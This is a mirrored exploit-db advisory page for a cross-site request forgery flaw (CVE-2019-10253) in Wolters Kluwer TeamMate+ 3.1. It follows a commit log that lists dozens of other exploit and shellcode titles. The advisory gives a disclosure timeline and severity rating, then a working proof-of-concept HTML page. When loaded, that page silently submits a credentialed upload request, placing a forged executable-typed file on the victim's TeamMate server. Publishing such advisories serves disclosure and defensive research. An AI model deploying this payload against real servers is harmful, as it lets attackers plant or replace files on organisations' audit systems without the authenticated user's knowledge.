bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/47342.html
Offensive Security 1979df6cb3 DB: 2020-06-19 
51 changes to exploits/shellcodes

Tor Browser < 0.3.2.10 - Use After Free (PoC)
Notepad++ < 7.7 (x64)  - Denial of Service
SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
InputMapper 1.6.10 - Denial of Service

SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)

XnConvert 1.82 - Denial of Service (PoC)

SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)

SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)

Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)

FreeBSD 12.0 - 'fd' Local Privilege Escalation
iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation
Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH)

DeviceViewer 3.12.0.1 - Arbitrary Password Change

Winrar 5.80 - XML External Entity Injection

Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution

Siemens TIA Portal - Remote Command Execution

Android 7 < 9 - Remote Code Execution
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)
CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)

MyBB < 1.8.21 - Remote Code Execution

Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation

Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)

Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery

Publisure Hybrid - Multiple Vulnerabilities

NetGain EM Plus 10.1.68 - Remote Command Execution

Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection

WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion

DotNetNuke 9.3.2 - Cross-Site Scripting

VehicleWorkshop 1.0 - 'bookingid' SQL Injection
WordPress Plugin Tutor.1.5.3 - Local File Inclusion
WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
WordPress Plugin Wordfence.7.4.5 - Local File Disclosure
WordPress Plugin contact-form-7 5.1.6 - Remote File Upload

WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion

WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting

WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
Joomla! 3.9.0 < 3.9.7 - CSV Injection
PlaySMS 1.4.3 - Template Injection / Remote Code Execution
Wing FTP Server - Authenticated CSRF (Delete Admin)

WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification

UADMIN Botnet 1.0 - 'link' SQL Injection

Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload

Wordpress Plugin PicUploader 1.0 - Remote File Upload

PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution

WordPress Plugin Helpful 2.4.11 - SQL Injection

Prestashop 1.7.6.4 - Cross-Site Request Forgery

WordPress Plugin Simple File List 5.4 - Remote Code Execution

Library CMS Powerful Book Management System 2.2.0 - Session Fixation

Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection

Beauty Parlour Management System 1.0 - Authentication Bypass

Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)

Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)

Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
2020-06-19 05:02:01 +00:00

233 lines
No EOL
5.9 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Hello,
Please find the below vulnerability details,
---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ Cross-Site Request Forgery
(CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0)
# CVE : CVE-2019-10253
This is an article with PoC exploit code for for Wolters Kluwer TeamMate+
Cross-Site Request Forgery (CSRF) vulnerability
---------------------------------------------------------------------------------------------------------------------------------
Title:
====
Wolters Kluwer TeamMate+ Cross-Site Request Forgery (CSRF) vulnerability
CVE:
====
CVE-2019-10253
Date:
====
02/09/2019 (dd/mm/yyyy)
Vendor:
======
Wolters Kluwer is a global leader in professional information, software
solutions, and services for the health, tax & accounting, finance, risk &
compliance, and legal sectors. We help our customers make critical
decisions every day by providing expert solutions that combine deep domain
knowledge with specialized technology and services.
Vendor link: http://www.teammatesolutions.com/about-us.aspx
Vulnerable Product:
==============
TeamMate+
TeamMate Global Audit Solutions, part of the Tax and Accounting Division of
Wolters Kluwer, helps professionals in all industries at organizations
around the world manage audit and compliance risks and business issues by
providing targeted, configurable, and efficient software solutions.
Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate
Analytics. Together, this ecosystem of solutions provides organizations
with the combined assurance they need to manage all aspects of risk
identification and assessment, electronic working paper creation and
management, controls framework management, and data analysis.
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an
attacker to upload malicious/forged files on TeamMate server or replace
existing uploaded files with malicious/forged files by enticing
authenticated user to visit attacker page.
Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2
Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)
Exploitation-Technique:
=======================
Remote
Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE ID:
=======
CVE-2019-10253
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in
TeamMate+ which allows a remote attacker to modify application data (upload
malicious/forged files on TeamMate server or replace existing uploaded
files with malicious/forged files) without victim's knowledge by enticing
authenticated user to visit attacker page/URL.
The specific flaw exists within the handling of request to
“DomainObjectDocumentUpload.ashx” application. An application failed to
validate CSRF token before handling the POST request.
Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx
PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body onload="submitRequest()">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx",
true);
xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
"\r\n" +
"0\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"parentId\"\r\n" +
"\r\n" +
"1373\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
"\r\n" +
"34\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
"\r\n" +
"1106\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
"\r\n" +
"50\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data;
name=\"DocumentParentObjectType\"\r\n" +
"\r\n" +
"90\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"files[]\";
filename=\"Report.txt\"\r\n" +
"Content-Type: application/x-msdownload\r\n" +
"\r\n" +
"MZP\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
----------------------------------------------------------------------------
Credits:
=======
Bhadresh Patel
Reference in a new issue View git blame Copy permalink